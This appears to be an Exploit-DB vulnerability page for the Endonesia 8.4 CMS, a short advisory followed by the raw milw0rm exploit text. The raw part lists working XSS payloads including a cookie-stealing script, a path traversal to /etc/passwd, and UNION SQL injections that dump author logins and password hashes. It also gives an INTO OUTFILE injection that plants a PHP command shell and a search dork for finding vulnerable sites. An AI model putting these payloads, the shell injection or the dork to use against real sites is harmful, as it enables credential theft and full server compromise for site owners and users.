bugs for Endonesia8.4

vendor:

Endonesia8.4

by:

milw0rm.com

7,5

CVSS

HIGH

Multiple XSS and SQL Injection

89, 79

CWE

Product Name: Endonesia8.4

Affected Version From: Endonesia8.4

Affected Version To: Endonesia8.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

Multiple XSS and SQL Injection vulnerabilities in Endonesia8.4 allow remote attackers to inject arbitrary web script or HTML, and execute arbitrary SQL commands via the (1) mod parameter in mod.php, (2) friend parameter in friend.php, (3) maintext parameter in admin.php, (4) intypeid parameter in mod.php, (5) cid parameter in mod.php, (6) did parameter in mod.php, (7) cid parameter in katalog.php, and (8) cid parameter in diskusi.php, and allow remote attackers to execute arbitrary commands via the did parameter in diskusi.php.

Mitigation:

Input validation and sanitization should be done to prevent XSS and SQL Injection attacks.

Source

Exploit-DB raw data:

bugs for Endonesia8.4 
FInd:z1ckX(ru)
mail:map-master@mail.ru
1) http://localhost/en/mod.php?mod=[XSS]&op=viewlink&cid=5
2) http://localhost/en/friend.php your Friend:[XSS]
3) http://localhost/en/admin.php Main Text: [XSS]
4) http://localhost/en/mod.php?mod=informasi&op=showinfo&intypeid= ><script>document.write(document.cookie)</script>
5) http://localhost/en/mod.php?mod=../../../../../etc/passwd%00
6) http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4%20union%20select%200,0,name,0,pwd,0,0%20from%20authors/* - LOGIN AND PASS (MD5)
7) http://localhost/en/mod.php?mod=katalog&op=viewlink&cid=-2%20union%20select%200,pwd,0%20from%20authors%20where%20counter=1/*
8) http://localhost/en/mod.php?mod=diskusi&op=viewcat&cid=-2%20union%20select%200,0,0/*

-=====SHELL====-
http://localhost/en/mod.php?mod=diskusi&op=viewdisk&did=-4 %20union%20select%200,0,'<? system($cmd)?>',0,0,0,0%20from%20authors into outfile '/home/localhost/www/en/cmd.php'/*

-======dork=====-
inurl:mod.php?mod=diskusi&op=   

# milw0rm.com [2006-12-25]